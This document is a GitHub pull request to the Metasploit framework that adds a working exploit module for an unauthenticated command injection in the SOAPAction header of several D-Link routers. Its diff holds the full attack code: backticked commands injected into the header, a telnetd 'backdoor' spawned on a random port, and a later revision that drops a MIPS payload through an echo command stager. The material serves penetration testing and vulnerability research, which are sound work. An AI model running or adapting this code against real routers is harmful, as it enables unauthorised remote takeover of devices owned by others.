### PR TITLE
Dlink UPnP SOAP-Header Injection

### DIFF
--- a/lib/rex/exploitation/cmdstager/echo.rb
+++ b/lib/rex/exploitation/cmdstager/echo.rb
@@ -26,10 +26,14 @@ class CmdStagerEcho < CmdStagerBase
   # and initialize opts[:enc_format].
   #
   def generate(opts = {})
-    opts[:temp] = opts[:temp] || '/tmp/'
-    opts[:temp].gsub!(/\\/, "/")
-    opts[:temp] = opts[:temp].shellescape
-    opts[:temp] << '/' if opts[:temp][-1,1] != '/'
+    if opts[:temp] == false
+      opts[:temp] = ''
+    else
+      opts[:temp] = opts[:temp] || '/tmp/'
+      opts[:temp].gsub!(/\\/, "/")
+      opts[:temp] = opts[:temp].shellescape
+      opts[:temp] << '/' if opts[:temp][-1,1] != '/'
+    end
 
     # by default use the 'hex' encoding
     opts[:enc_format] = opts[:enc_format] || 'hex'

--- a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
@@ -1,0 +1,134 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::CommandShell
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'D-Link Devices UPnP SOAPAction-Header Command Execution',
+      'Description' => %q{
+        Different D-Link Routers are vulnerable to OS command injection in the UPnP SOAP
+        interface. Since it is a blind OS command injection vulnerability, there is no
+        output for the executed command. This module has been tested on a DIR-645 device.
+        The following devices are also reported as affected:
+        DAP-1522 revB, DAP-1650 revB, DIR-880L, DIR-865L, DIR-860L revA, DIR-860L revB
+        DIR-815 revB, DIR-300 revB, DIR-600 revB, DIR-645, TEW-751DR, TEW-733GR
+      },
+      'Author'      =>
+        [
+          'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645
+          'Craig Heffner', # independent Vulnerability discovery on different other routers
+          'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          ['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051'],
+          ['URL', 'http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/']
+        ],
+      'DisclosureDate' => 'Feb 13 2015',
+      'Privileged'     => true,
+      'Platform'       => 'unix',
+      'Arch'        => ARCH_CMD,
+      'Targets'        =>
+        [
+          [ 'Automatic',        { } ]
+        ],
+      'DefaultTarget'  => 0
+      ))
+  end
+
+  def check
+    uri = '/HNAP1/'
+    soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings"
+
+    begin
+      res = send_request_cgi({
+        'uri'    => uri,
+        'method' => 'GET',
+        'headers' => {
+          'SOAPAction' => soapaction,
+          },
+      })
+      if res && [200].include?(res.code) && res.body =~ /D-Link/
+        return Exploit::CheckCode::Detected
+      end
+    rescue ::Rex::ConnectionError
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Unknown
+  end
+
+  def exploit
+    print_status("#{peer} - Trying to access the device ...")
+
+    unless check == Exploit::CheckCode::Detected
+      fail_with(Failure::Unknown, "#{peer} - Failed to access the vulnerable device")
+    end
+
+    print_status("#{peer} - Exploiting...")
+
+    telnetport = rand(32767) + 32768
+
+    cmd = "telnetd -p #{telnetport}"
+
+    execute_command(cmd)
+
+    handle_telnet(telnetport)
+  end
+
+  def handle_telnet(telnetport)
+
+    begin
+      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
+
+      if sock
+        print_good("#{peer} - Backdoor service spawned")
+        add_socket(sock)
+      else
+        fail_with(Failure::Unreachable, "#{peer} - Backdoor service not spawned")
+      end
+
+      print_status "Starting a Telnet session #{rhost}:#{telnetport}"
+      merge_me = {
+        'USERPASS_FILE' => nil,
+        'USER_FILE'     => nil,
+        'PASS_FILE'     => nil,
+        'USERNAME'      => nil,
+        'PASSWORD'      => nil
+      }
+      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
+    rescue
+      fail_with(Failure::Unreachable, "#{peer} - Backdoor service not handled")
+    end
+    return
+  end
+
+  def execute_command(cmd)
+
+    uri = '/HNAP1/'
+
+    soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd}`"
+
+    begin
+      res = send_request_cgi({
+        'uri'    => uri,
+        'method' => 'GET',
+        'headers' => {
+          'SOAPAction' => soapaction,
+          },
+      },1)
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
+    end
+  end
+end

--- a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
@@ -9,7 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = NormalRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Auxiliary::CommandShell
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'Author'      =>
         [
           'Samuel Huntley', # first public documentation of this Vulnerability on DIR-645
-          'Craig Heffner', # independent Vulnerability discovery on different other routers
+          'Craig Heffner',  # independent Vulnerability discovery on different other routers
           'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
         ],
       'License'     => MSF_LICENSE,
@@ -37,13 +37,25 @@ class Metasploit3 < Msf::Exploit::Remote
       'DisclosureDate' => 'Feb 13 2015',
       'Privileged'     => true,
       'Platform'       => 'unix',
-      'Arch'        => ARCH_CMD,
-      'Targets'        =>
+      'Targets' =>
         [
-          [ 'Automatic',        { } ]
+          [ 'MIPS Little Endian',
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPSLE
+            }
+          ],
+          [ 'MIPS Big Endian',  # unknown if there are BE devices out there ... but in case we have a target
+            {
+              'Platform' => 'linux',
+              'Arch'     => ARCH_MIPS
+            }
+          ],
         ],
-      'DefaultTarget'  => 0
+      'DefaultTarget'    => 0
       ))
+
+      deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
   end
 
   def check
@@ -77,47 +89,20 @@ class Metasploit3 < Msf::Exploit::Remote
 
     print_status("#{peer} - Exploiting...")
 
-    telnetport = rand(32767) + 32768
+    execute_cmdstager(
+      :flavor  => :echo,
+      :linemax => 200,
+      :temp    => false
+    )
 
-    cmd = "telnetd -p #{telnetport}"
-
-    execute_command(cmd)
-
-    handle_telnet(telnetport)
   end
 
-  def handle_telnet(telnetport)
-
-    begin
-      sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i })
-
-      if sock
-        print_good("#{peer} - Backdoor service spawned")
-        add_socket(sock)
-      else
-        fail_with(Failure::Unreachable, "#{peer} - Backdoor service not spawned")
-      end
-
-      print_status "Starting a Telnet session #{rhost}:#{telnetport}"
-      merge_me = {
-        'USERPASS_FILE' => nil,
-        'USER_FILE'     => nil,
-        'PASS_FILE'     => nil,
-        'USERNAME'      => nil,
-        'PASSWORD'      => nil
-      }
-      start_session(self, "TELNET (#{rhost}:#{telnetport})", merge_me, false, sock)
-    rescue
-      fail_with(Failure::Unreachable, "#{peer} - Backdoor service not handled")
-    end
-    return
-  end
-
-  def execute_command(cmd)
+  def execute_command(cmd, opts)
 
     uri = '/HNAP1/'
 
-    soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd}`"
+    cmd_new = "cd && cd tmp && export PATH=$PATH:. && " << cmd
+    soapaction = "http://purenetworks.com/HNAP1/GetDeviceSettings/`#{cmd_new}`"
 
     begin
       res = send_request_cgi({

--- a/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
+++ b/modules/exploits/linux/http/dlink_upnp_header_exec_noauth.rb
@@ -48,7 +48,7 @@ class Metasploit3 < Msf::Exploit::Remote
           [ 'MIPS Big Endian',  # unknown if there are BE devices out there ... but in case we have a target
             {
               'Platform' => 'linux',
-              'Arch'     => ARCH_MIPS
+              'Arch'     => ARCH_MIPSBE
             }
           ],
         ],


### PR DESCRIPTION
Here we have the module from the original exploit created by Craig Heffner: http://www.devttys0.com/2015/04/hacking-the-d-link-dir-890l/
and here the advisory from D-Link: http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10051

The module was tested on a DIR-645 router

Screenshot:
![upnp-header-telnet-session](https://cloud.githubusercontent.com/assets/497520/7210865/aef8c954-e555-11e4-9ca3-896807b6d9b5.png)

The telnet session is not ideal but we can't use characters like the / for writing to the temp directory on the filesystem ...
